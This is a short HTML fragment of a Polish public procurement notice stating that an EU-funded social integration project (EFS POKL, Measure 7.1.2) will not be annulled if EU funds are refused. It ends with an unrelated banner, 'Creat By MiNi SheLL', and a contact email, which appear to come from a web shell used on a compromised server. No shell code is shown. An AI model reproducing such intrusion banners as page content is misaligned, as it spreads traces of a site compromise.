<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany ze środków Unii Europejskiej w ramach EFS POKL, Działanie 7.1 rozwój i upowszechnianie form aktywnej integracji, poddziałanie 7.1.2 rozwój i upowszechnianie form aktywnej  integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com